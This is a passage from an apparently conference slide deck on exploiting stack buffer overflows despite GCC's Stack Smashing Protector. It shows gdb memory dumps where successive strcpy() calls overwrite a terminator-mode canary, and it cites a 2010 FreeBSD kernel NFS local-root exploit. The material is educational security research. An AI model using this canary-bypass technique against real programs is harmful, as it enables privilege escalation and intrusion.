  • 44. Stack Smashing Protector 4. Exploitation with “Terminator” mode Step by step first strcpy(): (gdb) x/32xw $esp 0xbfe9d8d0: 0xbfe9d8ec 0xbfe9face 0x00000000 0xbfe9face 0xbfe9d8e0: 0xbfe9fac5 0xbfe9faad 0x00000000 0x00000000 0xbfe9d8f0: 0x00000000 0x00000000 0x00000000 0x41414141 0xbfe9d900: 0x41414141 0xff0a4141 0x41414141 0x41414141 0xbfe9d910: 0x41414141 0xbfe90041 0xbfe9face 0x08048334 Second strcpy() : (gdb) x/32xw $esp 0xbfe9d8d0: 0xbfe9d8ec 0xbfe9face 0x00000000 0xbfe9face 0xbfe9d8e0: 0xbfe9fac5 0xbfe9faad 0x00000000 0x00000000 0xbfe9d8f0: 0x00000000 0x42424242 0x42424242 0x42424242 0xbfe9d900: 0x42424242 0xff0a0042 0x41414141 0x41414141 0xbfe9d910: 0x41414141 0xbfe90041 0xbfe9face 0x08048334 Last strcpy() : (gdb) x/32xw $esp 0xbfe9d8d0: 0xbfe9d8ec 0xbfe9face 0x00000000 0xbfe9face 0xbfe9d8e0: 0xbfe9fac5 0xbfe9faad 0x00000000 0x43434343 0xbfe9d8f0: 0x43434343 0x43434343 0x43434343 0x43434343 0xbfe9d900: 0x43434343 0xff0a0000 0x41414141 0x41414141 0xbfe9d910: 0x41414141 0xbfe90041 0xbfe9face 0x08048334 Blue three variable, Green two, Red one and Pink the canary Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 45. Stack Smashing Protector 4. Exploitation with “Terminator” mode This POC shows that it is possible to overwrite a canary in terminator mode in a specific configuration (and some little tricks ;-) ) Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 46. Stack Smashing Protector 5. Real life example Exploit published on May 2010 : http://seclists.org/bugtraq/2010/May/272 FreeBSD kernel NFS client local root FreeBSD 8.x : crash due to SSP FreeBSD 7.x : local root -_- Improper argument validation cause a kernel stack oveflow Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 47. Stack Smashing Protector 6. Conclusion & questions Greeting : Thanks to W4kfu for his help : http://w4kfu.com Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST